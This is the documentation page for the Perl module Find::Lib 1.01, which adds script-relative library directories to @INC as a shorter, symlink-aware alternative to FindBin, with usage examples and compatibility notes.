- NAME - VERSION - SYNOPSIS - DESCRIPTION - DISCUSSION - USAGE - BACKWARD COMPATIBILITY - SEE ALSO - AUTHOR - BUGS - ACKNOWLEDGEMENT - SUPPORT & CRITICS NAME Find::Lib - Helper to smartly find libs to use in the filesystem tree VERSION Version 1.01 SYNOPSIS #!/usr/bin/perl -w; use strict; ## simple usage use Find::Lib '../mylib'; ## more libraries use Find::Lib '../mylib', 'local-lib'; ## More verbose and backward compatible with Find::Lib < 1.0 use Find::Lib libs => [ 'lib', '../lib', 'devlib' ]; ## resolve some path with minimum typing $dir = Find::Lib->catdir("..", "data"); $path = Find::Lib->catfile("..", "data", "test.yaml"); $base = Find::Lib->base; # or $base = Find::Lib::Base; DESCRIPTION The purpose of this module is to replace use FindBin; use lib "$FindBin::Bin/../bootstrap/lib"; with something shorter. This is specially useful if your project has a lot of scripts (For instance tests scripts). use Find::Lib '../bootstrap/lib'; The important differences between FindBin and Find::Lib are: symlinks and '..' If you have symlinks in your path it respects them, so basically you can forget you have symlinks, because Find::Lib will do the natural thing (NOT ignore them), and resolve '..' correctly. FindBin breaks if you do: use lib "$Bin/../lib"; and you currently are in a symlinked directory, because $Bin resolved to the filesystem path (without the symlink) and not the shell path. convenience it's faster too type, and more intuitive (Exporting $Binalways felt weird to me). DISCUSSION Installation and availability of this module The usefulness of this module is seriously reduced if Find::Lib is not already in your @INC / $ENV{PERL5LIB} -- Chicken and egg problem. This is the big disavantage of FindBin over Find::Lib: FindBin is distributed with Perl. To mitigate that, you need to be sure of global availability of the module in the system (You could install it via your favorite package managment system for instance). modification of $0 and chdir (BEGIN blocks, other 'use') As soon as Find::Lib is compiled it saves the location of the script and the initial cwd (current working directory), which are the two pieces of information the module relies on to interpret the relative path given by the calling program. If one of cwd, $ENV{PWD} or $0 is changed before Find::Lib has a chance to do its job, then Find::Lib will most probably die, saying "The script cannot be found". I don't know a workaround that. So be sure to load Find::Lib as soon as possible in your script to minimize problems (you are in control!). (some programs alter $0 to customize the display line of the process in the system process-list ( ps on unix). (Note, see perlvar for explanation of $0) USAGE import All the work is done in import. So you need to 'use Find::Lib' and pass a list of paths to add to @INC. See "BACKWARD COMPATIBILITY" section for more retails on this topic. The paths given are (should) be relative to the location of the current script. The paths won't be added unless the path actually exists on disk base Returns the detected base (the directory where the script lives in). It's a string, and is the same as $Find::Lib::Base. catfile A shorcut to File::Spec::catfile using Find::Lib's base. catdir A shorcut to File::Spec::catdir using Find::Lib's base. BACKWARD COMPATIBILITY in versions <1.0 of Find::Lib, the import arguments allowed you to specify a Bootstrap package. This option is now removed breaking backward compatibility. I'm sorry about that, but that was a dumb idea of mine to save more typing. But it saves, like, 3 characters at the expense of readability. So, I'm sure I didn't break anybody, because probabaly no one was relying on a stupid behaviour. However, the multiple libs argument passing is kept intact: you can still use: use Find::Lib libs => [ 'a', 'b', 'c' ]; where libs is a reference to a list of path to add to @INC. The short forms implies that the first argument passed to import is not libs or pkgs. An example of usage is given in the SYNOPSIS section. SEE ALSO FindBin, FindBin::libs, lib, rlib, local::lib AUTHOR Yann Kerherve, <yann.kerherve at gmail.com> BUGS Please report any bugs or feature requests to bug-find-lib at rt.cpan.org, or through the web interface at. I will be notified, and then you'll automatically be notified of progress on your bug as I make changes. ACKNOWLEDGEMENT Six Apart hackers nourrished the discussion that led to this module creation. Jonathan Steinert (hachi) for doing all the conception of 0.03 shell expansion mode with me. SUPPORT & CRITICS I welcome feedback about this module, don't hesitate to contact me regarding this module, usage or code. You can find documentation for this module with the perldoc command. perldoc Find::Lib.
https://metacpan.org/pod/release/YANNK/Find-Lib-1.04/lib/Find/Lib.pm
CC-MAIN-2018-34
refinedweb
809
64.91
- XML design, part 1: compiler integration Thu, 2009-12-10, 18:23 There is a close relationship between Scala compiler and XML literals. The compiler recognise type and content of literals in the phase of value assignment and during pattern matching. The XML vocabulary is widley understood by the compiler: Literals for value assignment: - XML declaration (<?xml ... ?>) is recognised as a processing instruction. This compiles, but leads to a runtime error. - Elements, attributes and namespaces are recognised. Ok. - Start of CDATA: ok; End of CDATA: if missing, no error message. - Well-formedness is recognised. Ok. - Processing instructions are recognised. Ok. - Entities are recognised. Ok. Literals for pattern within match construct: - XML declaration will not compile. - Elements and namespaces are recognised. Ok. There are discussions about correctness of namespace evaluation, see bug #2156. - Attributes will not compile: see bug #2156 - CDATA: will not compile: Ok. - Well-formedness is recognised. Ok. - Processing instructions will not compile. - Entities are recognised in compilation phase, but leads to wrong results during execution. One additional note: The "\" and "\\" operators are methodes of scala.xml.NodeSeq. It's not a compiler feature. My feeling is that the actual state (2.7.7) of the XML support of Scala compiler is not perfect, but good enough for the near and mid future. In combination with the "\" and "\\" operators many people can easily solve simple tasks. Cheers, Jürgen
http://www.scala-lang.org/old/node/4493
CC-MAIN-2014-15
refinedweb
229
52.87
31 May 2012 04:29 [Source: ICIS news] SINGAPORE (ICIS)--TPI Polene’s 158,000 tonne/year ethylene vinyl acetate/low density polyethylene (EVA/LDPE) swing plant in Map Ta Phut, ?xml:namespace> The plant was taken off line on 26 May after some deferment in schedule because of delays in the delivery of a spare part required for the maintenance, the source said. “The shutdown will take around 10 to 15 days,” he said, although the exact restart schedule could not be confirmed yet. Corp and DuPont-Mitsui Polychemicals; China’s BASF-YPC, Beijing Organic, DuPont Packaging & Industrial Polymers, and; The Polyolefin Co
http://www.icis.com/Articles/2012/05/31/9565679/thai-tpi-polenes-map-ta-phut-eva-plant-shut-for-maintenance.html
CC-MAIN-2014-42
refinedweb
104
56.29
B: Comparing C++ and Java -. - Java has both kinds of comments like C++ does. - Everything must be in a class. There are no global functions or global data. If you want the equivalent of globals, make static methods and static data within a class. There are no structs or enumerations or unions, only classes. - All method definitions are defined in the body of the class. Thus, in C++ it would look like all the functions are inlined, but they’re not (inlines are noted later). - Class definitions are roughly the same form in Java as in C++, but there’s no closing semicolon. There are no class declarations of the form class foo, only class definitions. class aType { void aMethod( ) { /* method body */ } - There’ll). -: 1. Conditional expressions can be only boolean , not integral. 2. The result of an expression like X + Y must be used; you can’t just say “X + Y” for the side effect. - The char type uses the international 16-bit Unicode character set, so it can automatically represent most national characters. - Static quoted strings are automatically converted into String objects. There is no independent static character array string like there is in C and C++. - Java adds the triple right shift >>> to act as a “logical” right shift by inserting zeroes at the top end; the >> inserts the sign bit as it shifts (an “arithmetic” shift). - is a first-class object, with all of the methods commonly available to all other objects. - All objects of non-primitive types can be created only via new. There’s.) - No forward declarations are necessary in Java. If you want to use a class or a method before it is defined, you simply use it – the compiler ensures that the appropriate definition exists. Thus you don’t have any of the forward referencing issues that you do in C++. - Java has no preprocessor. If you want to use classes in another library, you say import and the name of the library. There are no preprocessor-like macros. -. - Object handles defined as class members are automatically initialized to null. Initialization of primitive class data members is guaranteed in Java; if you don’t explicitly initialize them they get a default value (a zero or equivalent). You can initialize them explicitly, either when you define them in the class or in the constructor. The syntax makes more sense than that for C++, and is consistent for static and non- static members alike. You don’t need to externally define storage for static members like you do in C++. - There are no Java pointers in the sense of C and C++. When you create an object with new, you get back a reference (which I’ve been calling a handle in this book). For example: String s = new String(“howdy”); However, unlike C++ references that must be initialized when created and cannot be rebound to a different location, Java references don’t doesn’t support them). Pointers are often seen as an efficient way to move through an array of primitive variables; Java arrays allow you to do that in a safer fashion. The ultimate solution for pointer problems is native methods (discussed in Appendix A). Passing pointers to methods isn’t a problem since there are no global functions, only classes, and you can pass references to objects. The Java language promoters initially said “No pointers!”, but when many programmers questioned how you can work without pointers, the promoters began saying “Restricted pointers.” You can make up your mind whether it’s “really” a pointer or not. In any event, there’s no pointer arithmetic. - Java has constructors that are similar to constructors in C++. You get a default constructor if you don’t define one, and if you define a non-default constructor, there’s no automatic default constructor defined for you, just like in C++. There are no copy constructors, since all arguments are passed by reference. - There are no destructors in Java. There is no “scope” of a variable per se, to indicate when the object’s lifetime is ended – the lifetime of an object is determined instead by the garbage collector. There is a finalize( ) method that’s doesn’t support destructors, you must be careful to create a cleanup method if it’s necessary and to explicitly call all the cleanup methods for the base class and member objects in your class. - Java has method overloading that works virtually identically to C++ function overloading. - Java does not support default arguments. - There’s no goto in Java. The one unconditional jump mechanism is the break label or continue label, which is used to jump out of the middle of multiply-nested loops. -). The new collections in Java 1.2 are more complete, but still don’t).. - Java has built-in multithreading support. There’re still responsible for implementing more sophisticated synchronization between threads by creating your own “monitor” class. Recursive synchronized methods work correctly. Time slicing is not guaranteed between equal priority threads. - (equivalent to them all being C++ friends) but inaccessible outside the package. The class, and each method within the class, has an access specifier to determine whether it’s that means “accessible to inheritors only ” ( private protected used to do this, but the use of that keyword pair was removed). - Nested classes. In C++, nesting a class is an aid to name hiding and code organization (but C++ namespaces eliminate the need for name hiding). Java packaging provides the equivalence of namespaces, so that isn’t an issue. Java 1.1 has inner classes that++. - Because of inner classes described in the previous point, there are no pointers to members in Java. - No inline methods. The Java compiler might decide on its own to inline a method, but you don’t have much control over this. You can suggest inlining in Java by using the final keyword for a method. However, inline functions are only suggestions to the C++ compiler as well. -. There’s no explicit constructor initializer list like in C++, but the compiler forces you to perform all base-class initialization at the beginning of the constructor body and it won’t } } - Inheritance in Java doesn’t checks for this). -. An abstract class may contain abstract methods (although it isn’t required to contain any), but it is also able to contain implementations, so it is restricted to single inheritance. Together with interfaces, this scheme prevents the need for some mechanism like virtual base classes in C++. To create a version of the interface that can be instantiated, use the implements keyword, whose syntax looks like inheritance: public interface Face { public void smile(); } public class Baz extends Bar implements Face { public void smile( ) { System.out.println("a warm smile"); } } - There’s no virtual keyword in Java because all non- static methods always use dynamic binding. In Java, the programmer doesn’t have to decide whether to use dynamic binding. The reason virtual exists in C++ is so you can leave it off for a slight increase in efficiency when you’re tuning for performance (or, put another way, “If you don’t use it, you don’t. - Java doesn’t provide multiple inheritance (MI), at least not in the same sense that C++ does. Like protected, MI seems like a good idea but you know you need it only when you are face to face with a certain design problem. Since Java uses a singly-rooted hierarchy, you’ll probably run into fewer situations in which MI is necessary. The interface keyword takes care of combining multiple interfaces. - Run-time type identification functionality is quite similar to that doesn’t have the benefit of easy location of casts as in C++ “new casts,” Java checks usage and throws exceptions so it won’t allow bad casts like C++ does. - Exception handling in Java is different because there are no destructors. A finally clause can be added to force execution of statements that perform necessary cleanup. All exceptions in Java are inherited from the base class Throwable, so you’re guaranteed a common interface. public void f(Obj b) throws IOException { myresource mr = b.createResource(); try { mr.UseResource(); } catch (MyException e) { // handle my exception } catch (Throwable e) { // handle all other exceptions } finally { mr.dispose(); // special cleanup } } -. - Java has method overloading, but no operator overloading. The String class does use the + and += operators to concatenate strings and String expressions use automatic type conversion, but that’s a special built-in case. - – see Chapter 12). There’s no copy-constructor that’s automatically called. To create a compile-time constant value, you say, for example: static final int SIZE = 255; static final int BSIZE = 8 * SIZE; - Because of security issues, programming an “application” is quite different from programming an “applet.” A significant issue is that an applet won’t. -. - Java 1.1 includes the Java Beans standard, which is a way to create components that can be used in visual programming environments. This promotes visual components that can be used under all vendor’s development environments. Since you aren’t tied to a particular vendor’s doesn’t have to occur right before the use of a handle; the Java specification just says that the exception must somehow be thrown. Many C++ runtime systems can also throw exceptions for bad pointers. -
https://www.codeguru.com/java/tij/tij0198.shtml
CC-MAIN-2019-35
refinedweb
1,555
55.64
[Modern Apps] Build a Wi-Fi Scanner in the UWP By Frank La Vigne | July 2016 | Get the Code Wi-Fi has over the last decade or so become ubiquitous. Many shops and cafes offer free Wi-Fi to customers for their convenience. Virtually all hotels offer some kind of wireless Internet to their guests. Most of us have wireless networks at home. As few tablets and mobile devices have Ethernet jacks, Wi-Fi has become integral to our modern lives. Beyond that, we rarely give it much thought. So, questions abound. What about the sheer volume of Wi-Fi networks around us? How many are there? Are they secured? What channel are they on? What are they named? Can we map them? What can we learn from Wi-Fi network metadata? While walking my dogs recently, I happened to glance at my phone’s Wi-Fi network connection screen and noticed some witty network names. This got me to wonder how many others had chosen to be comical versus practical. Then, I had the idea to map out and scan wireless networks in and around my neighborhood. If I could automate the process, I could even scan and map wireless networks during my commute to work. Ideally, I could have a program running on a Raspberry Pi that would periodically scan wirelessly and record that data to a Web service. This certainly would be more practical than glancing at my phone intermittently. As it turns out, the Universal Windows Platform (UWP) provides rich access to wireless network data via classes in the Windows.Devices.WiFi namespace. As you know, a UWP app can run not only on phones and PCs, but on Raspberry Pi 2 running Windows 10 IoT Core. Now, I had all I needed to build out my project. In this column, I’ll explore the basics of scanning Wi-Fi networks using the APIs built right into the UWP. Windows.Devices.WiFi Namespace The classes inside the Windows.Devices.WiFi namespace contain everything needed to scan and explore wireless adapters and wireless networks within range. After creating a new UWP project in Visual Studio, add a new class called WifiScanner and add the following property: Because it’s possible to have multiple Wi-Fi adapters on a given system, you must pick the Wi-Fi adapter you want to use. The InitializeFirstAdapter method gets the first one enumerated in the system, as shown in Figure 1. private async Task InitializeFirstAdapter() { var access = await WiFiAdapter.RequestAccessAsync(); if (access != WiFiAccessStatus.Allowed) { throw new Exception("WiFiAccessStatus not allowed"); } else { var wifiAdapterResults = await DeviceInformation.FindAllAsync(WiFiAdapter.GetDeviceSelector()); if (wifiAdapterResults.Count >= 1) { this.WiFiAdapter = await WiFiAdapter.FromIdAsync(wifiAdapterResults[0].Id); } else { throw new Exception("WiFi Adapter not found."); } } } Adding the Wi-Fi Capability You might notice that there’s a check for access to the Wi-Fi and that the code throws an exception if the RequestAccessAsync method returns false. This is because the app needs to have a device capability to let it scan and connect to Wi-Fi networks. This capability isn’t listed in the Capabilities tab in the manifest properties editor. To add this capability, right-click on the Package.appxmanager file and choose View Code. You’ll now see the raw XML of the Package.appxmanager file. Inside the Capabilities node, add the following code: Now save the file. Your app now has permission to access the Wi-Fi APIs. Exploring Wireless Networks With the code to identify a Wi-Fi adapter to work with and permission to access it, the next step is to actually scan for networks. Fortunately, the code to do that is fairly simple; it’s just a call to the ScanAsync method on the WifiAdapter object. Add the following method to the WifiScanner class: Once ScanAsync runs, the NetworkReport property of the WifiAdapter gets populated. NetworkReport is an instance of WiFiNetworkReport, which contains AvailableNetworks, a List<WiFiAvailableNetwork>. The WiFiAvailableNework object contains numerous data points about a given network. You can find the Service Set Identifier (SSID), signal strength, encryption method and access point uptime, among other data points, all without connecting to the network. Iterating through the available networks is quite easy: You create a Plain Old CLR Object (POCO) to contain some of the data from the WiFiAvailableNetwork objects, as seen in the following code:, ChannelCenterFrequencyInKilohertz = availableNetwork.ChannelCenterFrequencyInKilohertz, NetworkKind = availableNetwork.NetworkKind.ToString(), PhysicalKind = availableNetwork.PhyKind.ToString() }; } Building the UI While I intend for the app to run without a UI in the final project, it’s useful for development and troubleshooting to see the networks within range and the metadata associated with them. It’s also useful for developers who might not have a Raspberry Pi at the moment, but still want to follow along. As shown in Figure 2, the XAML for the project is straightforward and there’s a multiline TextBox to store the output of the scan. <Grid Background="{ThemeResource ApplicationPageBackgroundThemeBrush}"> <Grid.RowDefinitions> <RowDefinition Height="60"/> <RowDefinition Height="60"/> <RowDefinition Height="*"/> </Grid.RowDefinitions> <TextBlock FontSize="36" Grid.WiFi Scanner</TextBlock> <StackPanel Name="spButtons" Grid. <Button Name="btnScan" Click="btnScan_Click" Grid.Scan For Networks</Button> </StackPanel> <TextBox Name="txbReport" TextWrapping="Wrap" AcceptsReturn="True" Grid.</TextBox> </Grid> </Page> Capturing Location Data In order to provide additional value, each scan of the wireless network should also note the location of the scan. This will make it possible to provide interesting insights and data visualizations later. Fortunately, adding location to UWP apps is simple. You will, however, need to add the Location capability to your app. You can do that by double-clicking on the Package.appxmanifest file in Solution Explorer, clicking on the Capabilities tab, and checking the Location checkbox in the Capabilities list. The following code will retrieve the location using the APIs built into the UWP: Now that you have a location, you’ll want to store the location data. Following is the WiFiPointData class, which stores location data along with information about networks found at the location: public class WiFiPointData { public DateTimeOffset TimeStamp { get; set; } public double Latitude { get; set; } public double Longitude { get; set; } public double Accuracy { get; set; } public List<WiFiSignal> WiFiSignals { get; set; } public WiFiPointData() { this.WiFiSignals = new List<WiFiSignal>(); } } At this time, it’s important to note that unless your device has a GPS device, then the app requires a Wi-Fi connection to the Internet in order to resolve location. Without an onboard GPS sensor, you’ll have to have a mobile hotspot and make sure that your laptop or Raspberry Pi 2 is connected to it. This also means that the reported location will be less accurate. For more information on best practices for creating location-aware UWP, please refer to the Windows Dev Center article, “Guidelines for Location-Aware Apps,” at bit.ly/1P0St0C. Scanning Repeatedly For a scanning-and-mapping-while-driving scenario, the app needs to periodically scan for Wi-Fi networks. To accomplish this, you’ll need to use a DispatchTimer to scan for Wi-Fi networks at regular intervals. If you’re not familiar with how DispatchTimer works, please refer to the documentation at bit.ly/1WPMFcp. It’s important to note that a Wi-Fi scan can take up to several seconds, depending on your system. The following code sets up a DispatchTimer to fire an event every 10 seconds, more than enough time for even the slowest system: Every 10 seconds, the timer will run the code in the Timer_Tick method. The following code scans for Wi-Fi networks and then appends the results to the TextBox in the UI: Reporting Scan Results As mentioned previously, once the ScanAsync method is called, the results of the scan are stored in a List<WiFiAvailableNetwork>. All it takes to get to those results is to iterate through the list. The code in Figure 3 does just that and places the results into an instance of the WiFiPointData class., NetworkKind = availableNetwork.NetworkKind.ToString(), PhysicalKind = availableNetwork.PhyKind.ToString(), Encryption = availableNetwork.SecuritySettings.NetworkEncryptionType.ToString() }; wifiPoint.WiFiSignals.Add(wifiSignal); } In order to make the UI simple while still providing for rich data analysis, you can convert the WiFiPointData to a Comma Separated Value (CSV) format and set the text of the TextBox in the UI. CSV is a relatively simple format that can be imported into Excel and Power BI for analysis. The code to convert WiFiPointData is shown in Figure 4. private StringBuilder CreateCsvReport(WiFiPointData wifiPoint) { StringBuilder networkInfo = new StringBuilder(); networkInfo.AppendLine("MAC,SSID,SignalBars,Type,Lat,Long,Accuracy,Encryption"); foreach (var wifiSignal in wifiPoint.WiFiSignals) { networkInfo.Append($"{wifiSignal.MacAddress},"); networkInfo.Append($"{wifiSignal.Ssid},"); networkInfo.Append($"{wifiSignal.SignalBars},"); networkInfo.Append($"{wifiSignal.NetworkKind},"); networkInfo.Append($"{wifiPoint.Latitude},"); networkInfo.Append($"{wifiPoint.Longitude},"); networkInfo.Append($"{wifiPoint.Accuracy},"); networkInfo.Append($"{wifiSignal.Encryption}"); networkInfo.AppendLine(); } return networkInfo; } Visualizing the Data Naturally, I couldn’t wait to set up my cloud service to display and visualize the data. Accordingly, I took the CSV data generated by the app and copied and pasted that into a text file. I then made sure to save the file with a .CSV extension. Next, I imported the data into Power BI Desktop. Power BI Desktop is a free download from powerbi.microsoft.com that makes it easy to visualize and explore data. To import the data from the app, click on Get Data on the Power Bi Desktop splash screen. On the following screen, choose CSV and then click Connect. In the file picker dialog, choose the CSV file with the data copied and pasted out of the app. Once that loads, you’ll then see a list of fields on the right hand side of the screen. While a full tutorial on Power BI Desktop is beyond the scope of this article, it doesn’t take much skill to produce a visualization that shows the location of Wi-Fi networks, their SSIDs and the encryption protocols they employ, as shown in Figure 5. Figure 5 Power BI Visualization of Data the Wi-Fi Scanner App Collected Amazingly, about one-third of networks are completely unencrypted. While some of these are guest networks set up at various businesses, some are not. Practical Applications While the original intent was merely to measure the technical savvy and wit of my neighbors, this project has some rather interesting practical uses. The ability to easily and automatically map Wi-Fi signal strength and location has interesting applications. What could a city do if each city bus were outfitted with an IoT device with this app running on it? Cities could measure the prevalence of Wi-Fi networks and correlate that data with neighborhood income data. Elected officials could then make informed policy decisions based on that data. If a community provides public Wi-Fi across town or in certain areas, then the signal strength could be measured in real time without the added cost of sending technicians around. Cities could also determine where unsecured networks were prevalent and create targeted awareness programs to increase community cyber security. On a smaller scale, the ability to quickly scan Wi-Fi network metadata comes in handy when setting up your own network. Many routers offer users the chance to modify the channel on which they broadcast. A great example of this is an app called “Wi-Fi Analyzer” (bit.ly/25ovZ0Q), which, among other things, displays the strength and frequency of nearby wireless networks. This comes in handy when setting up a Wi-Fi network in a new location. Wrapping Up Copying and pasting text data from the UI will not scale. Furthermore, if the goal is to run the app on an IoT device without any type of display, then the app needs to send data to the cloud without any UI. In my next month’s column, you’ll learn how to set up a cloud service to take in all this data. Additionally, you’ll learn how to deploy the solution to a Raspberry Pi 2 running Windows IoT Core. Jose Luis Manners Receive the MSDN Flash e-mail newsletter every other week, with news and information personalized to your interests and areas of focus. Modern Apps - Build a Wi-Fi Scanner in the UWP It is a great help indeed. I was trying to find some good and reliable API in UWP for many days. Jul 2, 2018 Modern Apps - Build a Wi-Fi Scanner in the UWP For me this is not working with visual studio 2015 windows 10. Cannot run the project giving error on deployment and null exceptions. Jan 26, 2018 Modern Apps - Build a Wi-Fi Scanner in the UWP I can't believe no one has posted on this yet! This is awesome! Thanks Frank! Apr 27, 2017 Modern Apps - Build a Wi-Fi Scanner in the UWP In this month’s Modern Apps column, Frank La Vigne explores the basics of scanning Wi-Fi networks using the APIs built into the Universal Windows Platform. Read this article in the July issue of MSDN Magazine Jul 1, 2016
https://msdn.microsoft.com/magazine/mt736460
CC-MAIN-2019-30
refinedweb
2,171
55.34
Hey guys, I've done a few small projects with Allegro before, nothing too intense, so it's quite possible that I'm missing a step or some info. glGenBuffers is throwing a good ole 'memory access error'. The debug shows it to not be properly initialized. Which correct me if I'm wrong here but I'm using the ALLEGRO_OPENGL_3_0 flag and this required 3.0 or >. And 3 has VBOs. So am I missing something to properly initialize the gl function calls. Something similar to glewInit perhaps? Includes #include <allegro5/allegro.h> #include <allegro5/allegro_opengl.h> Which I believe is all I need to include for opengl support in allegro correct? Display Creation (`al_init` is before this point and returns successfully) al_set_new_display_flags(ALLEGRO_OPENGL | ALLEGRO_OPENGL_3_0); display = al_create_display(display_data.width, display_data.height); Call to Generate a Buffer GLuint vboNy; glGenBuffers(1, &vboNy); The run time error occurs at the glGenBuffers call and using msvc's debugger shows that it isn't pointing to a valid location in memory where the function might exist. What steps am I missing to make glGenBuffers defined? Side note glGenBuffersARB is also not valid currently. Thanks for the prompt reply. Reference linked to: void glGenBuffers(GLsizei n, GLuint * buffers); They are one in the same(as far as a receiving function is concerned), GLuint x; &x; is equivalent to GLuint * x = new GLuint(); or GLuint x[] = {0}; x; They are all pointers to a GLuint/of type GLuint pointer. However I tried anyway(pointer definitions): GLuint * vboNy = new GLuint(); glGenBuffers(1, vboNy); Result in the same errors. Through msvc's debug again shows that glGenBuffers points to NULL. (glGenBuffers == NULL) //true std::cout << glGenBuffers; //00000000 Thanks edit clarified a statement. Similar code works on my end. Does your graphics card support OpenGL 3? Are the drivers up to date? Running a GTX 670, drivers are updated and I have had OpenGL 4 commands work outside of Allegro previously, in particular MultiDrawArraysIndirect. I noticed al_get_opengl_version in the docs. (Which I believe returns an int meant to be read as hex) And (what I believe to be odd) is this: printf("VERSION %X", al_get_opengl_version()); //VERSION 0 However it can't be 0 because I've been successful in using opengl until trying to move over from using VertexArrays stored cpu side to Buffers stored GPU side. Try and call al_set_current_opengl_context(display) before generating the VBO. How did you compile Allegro? Are you using the proper compiler runtime and, similarly, the proper libraries for the compiler runtime? This example works for me: Result: Version: 3000000 glGenBuffers == 5EEB4790 I downloaded the msvc 11 precompiled binaries from at the time it was 5.0.8 but I see now a new(stable) release is out. Linking to the allegro-5.0.8-monolith-md-debug.lib and have the equivalent .dll. I'll download source(5.0.9) from the and build it and see if it remedies the situation and I'll update this post with the result. Thanks edit Also I tried your suggestion no luck and your example for me produces the same result as I've been having. I feel like you're onto something with the whole allegro setup thing, I thought I'd get away with being lazy and use some precompiled binaries. However something tells me building it locally will probably fix this. UPDATE I built 5.0.9 from source using the msvc 11 compiler. Didn't resolve the issue it's still there. Maybe I should try 5.1.X although I doubt that's the issue anymore. Tried getting glew to play nice with Allegro(dirty I know but running out of options) couldn't get it to go. Not sure where to go from here and help/ideas are appreciated. Thanks UPDATE 2 It looks like it does, but just to be sure, Allegro does manage OpenGl extensions in Windows correct? UPDATE I overwrote MS's GL*.h files, with new ones of the equivalent version and this solved it. I'm still not sure what happened(if they got corrupt or what) or how but at least it's a thing of the past now. Thanks Guys The man page on opengl with allegro 5 gives you several ways to check for supported opengl extensions. Is glGenBuffers an extension? (I wouldn't know as I have little experience with OpenGL). And I thought I heard once upon a time Allegro would give you the latest OpenGL just with the ALLEGRO_OPENGL flag, (ie... and not with ALLEGRO_OPENGL_3_0 needed). Also, the manual says you have to create an OpenGL context (read - opengl allegro display) BEFORE calling al_get_opengl_version. I assume the rest of the opengl functions may behave similarly.
https://www.allegro.cc/forums/print-thread/612666
CC-MAIN-2018-09
refinedweb
788
66.54
Talk:Map features/Archive 1 - This is an archive of older discussions on the Talk:Map Features-page, if if grows too unwieldy it should be divided into several pages. Discussions that concern a specific topic that has a page of its own may be moved there, but a link to the moved discussion left here. Archive 2006 This section contains discussions that no further comment have been added to since 2006. Archived 07:56, 6 June 2008 (UTC) Compound words convention There is some inconsistency about the way compound words are created, compare "pubcrawl" with "national_park". IMHO we should use camel case: pubCrawl and nationalPark. - I agree we should be consistent, well spotted, we should also get the coder's views on the format. I'm concerned about the eventual size of the xml in terms of transfer so some shorthand version of both keys and values might be beneficial, although for this page I think we should keep to the plain English so that we can understand it better. Why not put the proposed actual keys and values in the xml format on a separate keys & values page(s). No reason why we should not devote a page to each one and link to each page from the table here. Blackadder 11:09, 17 Mar 2006 (UTC) Version identifier for agreed tag names Whatever is agreed should be labelled with some kind of version identifier so that clients can state that they expect data containing, say, "OSM-core-1.3" tags or "OSM-marine-1.0" tags or "Blackadder-Brum-3.2" tags or whatever. - I fully intend to add my own personal keys and values so that I can use the final output in my own specific way. Client software for editing needs to support any key and value in terms of the editing process, as JOSM does now. For rendering though I see that each bit of software will do either something specific with certain core keys or will allow users to map keys and values to a user defined schema in the client. Blackadder 11:09, 17 Mar 2006 (UTC) 80n 08:48, 17 Mar 2006 (UTC) - Good feedback. Thanks. Blackadder 11:09, 17 Mar 2006 (UTC) Think globally & other thoughts Just a few of my thoughs: I think that there needs to be a greater effort to think globally. There are plenty of little examples of specifically British things that could make life difficult when transferred to other countries. The tag that stuck out for me was "Motorway". The problem is inferred data. It makes sense to infer data from existing tags, to reduce file for each entity and reduce time and effort when the map is created. Eg, some of the tags you can infer from "highway=motoway" such as speed limits (high and low), resticted traffic, etc. become quite simply incorrect if that tag is used to describe a french Autoroute or german Autobahn. Also, there may be other data that is useful for a certain application that can be inferred from other tags, but may not be explicitly specified. I think there should be a definition of all other tags that can be directly inferred from each tag (might end up being a huge list) which would then be published (as part of the API) to be processed and mangled into whatever format then end application needs it Firstly, the tags need to be generic in nature, so that a gps using openstreetmap will not misinterpert a "motorway" appearing in another country, or not be able to find one because every country has their own tag based on their own road names (this would be bad). Also someone needs to define exactly what the road categories relate to. I would suggest (or this is what i think they mean compared to UK road types). - Motorway : Motorway (though I don't like the key) - Trunk: 2-lane A-road - Primary: A-road - Secondary: B-road - Minor: Every other public road - Residential: fairly obvious. Ideally a list like this would exist for all countries, so roads of similar quality appear in the database as the same In addition There doesn't seem to be obvious scope for multilingual names. This is most obviously a problem in Wales, but may also cause problems in other countries, eg the different british and german names for Munich or München. Also, I'm slightly confused about the real difference between a way and a segment. It's made fairly clear in the context of naming streets. But, what about a situation where the characteristics of a road change. eg. the high streets is many british towns have sections where they are pedestrianised and those where they are'nt What's supposed to happen in this situation? Should highway keys be put on the segments and the name on the way, or create 2 separate ways, or 3 ways, one for each part, and one for the whole lot? in short, what does the segement entity represent. Final thought. I'm not sure about whether this is the right place to put this, but it occurs to me that much of the thought going into this site is advocating "expandability" and "flexibility" without realising that maps only work because they have a list of extremely tight rules governing how things appear, are laid out, what to include, what not to include. These allow you, the user, to filter out the bits you don't need because the bits you do are consistently laid out, coloured, etc. For this project to work it needs to take responsibility and as much of the control as it can over the layout rules, but make sure that the mechanis=.ms are in place to deal with syntax changes, or quickly make additions to the rulebook to deal with a new requirement (ie. before 2 people decide to invent 2 different ways because the can't wait for the official word.). Sorry if some of it sounds a bit whiney, I don't mean to complain, just encourage debate by identifying my own problems with the system as it stands Sandothegrate 14:04, 21 Jun 2006 (UTC) Roundabouts How would a roundabout on a primary road be distinguished from a roundabout in a residential area? This should not be a highway tag. Need to be able to say highway=primary and junction=roundabout. 80n 18:00, 16 May 2006 (UTC) - A roundabout is an entity in its own right and roads happen to join it. What differentiates a Primary and a residential roundabout other than size (implied by its nodes). What would you put if a minor road crossed a primary road via a roundabout? --Dean Earley 19:00, 21 May 2006 (UTC) - After playing with Osmarender, I now see a reason for not using highway=roundabout. I still think things should be marked with highway=roundabout but can't suggest a way of rendering this. --Dean Earley 11:41, 25 May 2006 (UTC) Just as an example: Ojw would make 1,2,4 primary roads and 3 a secondary road, but tag them somehow with a roundabout-related tag so that we can identify them later... Maybe I'm thick, but I still can't work out what the reccomendation is here. In my opinion it makes most sense to make the way include all of the loop and any of the "triangles" at the exits, then tag it with both junction=roundabout and highway=x, where x would normally be the class of the biggest road joining to it, using the _link variant for motorway, trunk and primary roads. Sandothegrate 23:15, 1 Sep 2006 (BST) - I don't see a problem with your approach. Mine is only different in that I tend to have the forked ends adjoing the roundabout as part of the attached way rather that attached to the roundabout. In any case I make a way for the road leaning in, a way for the roundabout itself and then anotherone for the exiting road. This works fine on the whole for rendering purposes but does occasionally muck up the text which your method would aleviate as you dont normally render text on roundabouts. For navigation purposes... well thats another story! Blackadder 00:00, 2 Sep 2006 (BST) Authority, Reference, Creativity The current list of features is a wiki page. Does it mean I can edit it, and what implications does that have on developers of client software such as the Java applet and JOSM? Does the current list represent what happens to be in the OSM database? Or what the author of the wiki page wants to happen? Or does it reflect some already existing GIS standard? If such a standard already exists, should we still define our own? I'm using the Java applet and after a year I'm still just adding line segments. I'm very reluctant to the "ways" concept and apparently this list of features contradict the use of "class" in the Java applet. It's all a big mess and needs to be remade from scratch. --LA2 16:42, 1 